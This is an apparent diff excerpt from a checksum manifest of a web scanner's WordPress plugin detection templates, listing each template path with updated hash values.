-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
-http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
-http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
-http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
-http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
-http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
-http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46
-http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61
-http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f
-http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b
-http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f
-http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55
-http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
+http/technologies/wordpress/plugins/akismet.yaml:aae1aaad5533df8ca3806e87626f5bd7a3ed48d7
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
+http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
+http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
+http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
+http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
+http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
+http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
+http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
+http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
+http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
+http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
+http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
+http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
+http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
+http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
+http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
-http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff
-http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a
-http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e
-http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af
-http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb
-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb
-http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e
-http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c
-http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06
-http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7
-http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0
-http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c
-http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9
-http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606
-http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157
-http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a
-http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5
-http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7
-http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2
-http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e
+http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844
+http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c
+http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636
+http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e
+http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d
+http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a
+http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef
+http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f
+http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7
+http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057
+http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3
+http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459
+http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad
+http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c
+http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f
+http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7
+http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0
+http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af
+http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a
+http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677
+http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121
+http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984
 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45
-http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7
-http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72
-http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77
-http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb
-http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8
-http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1
-http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d
-http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0
-http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30
-http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb
-http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f
-http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2
-http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5
-http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a
-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9
-http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33
-http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599
-http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1
-http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4
-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e
-http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087
-http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d
-http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b
-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b
-http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b
-http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0
-http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630
+http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201
+http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab
+http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8
+http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77
+http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e
+http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca
+http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa
+http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444
+http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016
+http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1
+http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba
+http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d
+http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823
+http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0
+http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24
+http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca
+http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336
+http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a
+http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3
+http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3
+http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae
+http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053
+http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0
+http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214
+http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc
+http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb
+http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9
 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913
-http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7
-http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90
-http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078
-http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb
-http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994
-http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c
-http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47
-http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43
-http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5
-http/technologies/wordpress/plugins/instagram-feed.yaml:638a2ea1ff92407b33293b19f81421f64dcbbef2
-http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b
-http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952
-http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65
-http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e
-http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c
-http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9
-http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9
-http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9
-http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787
-http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764
-http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93
-http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b
+http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372
+http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765
+http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2
+http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23
+http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7
+http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317
+http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461
+http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4
+http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30
+http/technologies/wordpress/plugins/instagram-feed.yaml:f4867c229ee945f162265d86e1e20f9e908f32da
+http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b
+http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f
+http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391
+http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde
+http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a
+http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac
+http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc
+http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3
+http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046
+http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8
+http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b
+http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0
 http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c
-http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d
-http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea
-http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d
-http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd
-http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f
-http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919
-http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251
-http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e
-http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6
-http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50
-http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9
-http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c
-http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f
-http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6
-http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11
-http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0
-http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8
-http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70
-http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7
-http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1
-http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12
+http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3
+http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519
+http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4
+http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb
+http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4
+http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623
+http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd
+http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb
+http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510
+http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015
+http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9
+http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29
+http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf
+http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8
+http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5
+http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4
+http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159
+http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af
+http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9
+http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68
+http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18
 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd
 http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553
-http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5
-http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f
-http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83
-http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a
-http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa
-http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da
-http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2
-http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4
-http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39
-http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4
-http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad
-http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175
-http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5
-http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864
-http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845
-http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490
-http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf
-http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291
-http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92
-http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d
-http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59
+http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47
+http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c
+http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d
+http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988
+http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e
+http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2
+http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82
+http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4
+http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156
+http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4
+http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147
+http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19
+http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b
+http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8
+http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55
+http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd
+http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08
